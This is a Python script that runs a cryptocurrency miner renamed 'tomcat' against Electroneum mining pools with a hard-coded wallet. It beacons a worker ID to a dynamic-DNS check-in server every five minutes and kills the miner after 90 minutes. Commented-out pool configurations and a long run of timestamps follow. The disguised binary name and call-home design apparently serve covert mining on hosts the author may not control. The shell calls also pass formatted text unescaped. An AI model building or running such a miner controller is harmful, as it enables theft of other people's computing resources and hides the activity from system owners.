import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:06.900574
#2018-02-17 15:56:05.636143
#2018-02-17 17:45:06.530942
#2018-02-17 19:32:07.657568
#2018-02-17 21:22:05.164773
#2018-02-17 23:06:05.543496
#2018-02-18 00:53:05.015701
#2018-02-18 02:41:01.576461
#2018-02-18 04:29:01.892624
#2018-02-18 06:21:07.699717
#2018-02-18 08:10:04.299252
#2018-02-18 09:57:04.740352
#2018-02-18 11:44:05.400111
#2018-02-18 13:29:05.174088
#2018-02-18 15:19:03.637526
#2018-02-18 17:08:03.628541
#2018-02-18 18:56:03.812878
#2018-02-18 20:43:03.544169
#2018-02-18 22:28:01.802916
#2018-02-19 00:17:04.621390
#2018-02-19 02:03:02.167921
#2018-02-19 03:50:08.169636
#2018-02-19 05:35:09.244167
#2018-02-19 07:23:07.853579
#2018-02-19 09:13:02.139854
#2018-02-19 11:02:04.759584
#2018-02-19 12:48:01.784594
#2018-02-19 14:35:08.642648
#2018-02-19 16:25:06.682417
#2018-02-19 18:13:02.052986
#2018-02-19 19:59:01.684698
#2018-02-19 21:49:07.402593
#2018-02-19 23:35:04.413034
#2018-02-20 01:20:09.297659
#2018-02-20 03:11:05.172079
#2018-02-20 04:58:05.807906
#2018-02-20 06:41:06.773497
#2018-02-20 08:26:01.362766
#2018-02-20 10:11:01.443412
#2018-02-20 11:55:08.493078
#2018-02-20 13:42:07.235181
#2018-02-20 15:26:01.963375
#2018-02-20 17:11:10.599798
#2018-02-20 19:01:01.480423
#2018-02-20 20:49:03.976916
#2018-02-20 22:33:04.996278
#2018-02-21 00:16:01.512334
#2018-02-21 02:01:04.197652
#2018-02-21 03:48:03.522462
#2018-02-21 05:33:02.055769
#2018-02-21 07:21:01.360844
#2018-02-21 09:06:06.568550
#2018-02-21 10:55:01.603419
#2018-02-21 12:41:08.946834
#2018-02-21 14:29:08.211569
#2018-02-21 16:14:09.413534
#2018-02-21 18:05:08.866135
#2018-02-21 19:53:03.673077
#2018-02-21 21:40:04.678588
#2018-02-21 23:26:08.340403
#2018-02-22 01:14:01.507121
#2018-02-22 03:03:05.302706
#2018-02-22 04:49:04.989608
#2018-02-22 06:34:04.496343
#2018-02-22 08:21:06.298676
#2018-02-22 10:08:08.095509
#2018-02-22 11:54:11.464219
#2018-02-22 13:41:01.628225
#2018-02-22 15:28:08.599129
#2018-02-22 17:16:02.022635
#2018-02-22 19:02:10.549743
#2018-02-22 20:53:04.381435
#2018-02-22 22:39:10.438235
#2018-02-23 00:26:06.682690
#2018-02-23 02:13:05.186251
#2018-02-23 04:02:07.207094
#2018-02-23 05:48:03.779701
#2018-02-23 07:38:05.319097
#2018-02-23 09:41:06.385673
#2018-02-23 11:46:05.787290
#2018-02-23 13:36:05.217197
#2018-02-23 15:23:01.716886
#2018-02-23 17:12:07.687273
#2018-02-23 18:57:01.924905
#2018-02-23 20:44:01.635005
#2018-02-23 22:33:08.151162
#2018-02-24 00:19:01.734094
#2018-02-24 02:09:06.456209
#2018-02-24 03:59:07.651544
#2018-02-24 05:46:05.823187
#2018-02-24 07:39:05.418200
#2018-02-24 09:24:06.151396
#2018-02-24 11:18:04.716121
#2018-02-24 13:08:01.903376
#2018-02-24 14:58:06.153522
#2018-02-24 16:47:03.613963
#2018-02-24 18:35:08.873290
#2018-02-24 20:24:06.973165
#2018-02-24 22:20:06.089186
#2018-02-25 02:28:01.332064
#2018-02-25 06:07:04.174368
#2018-02-25 11:38:04.572083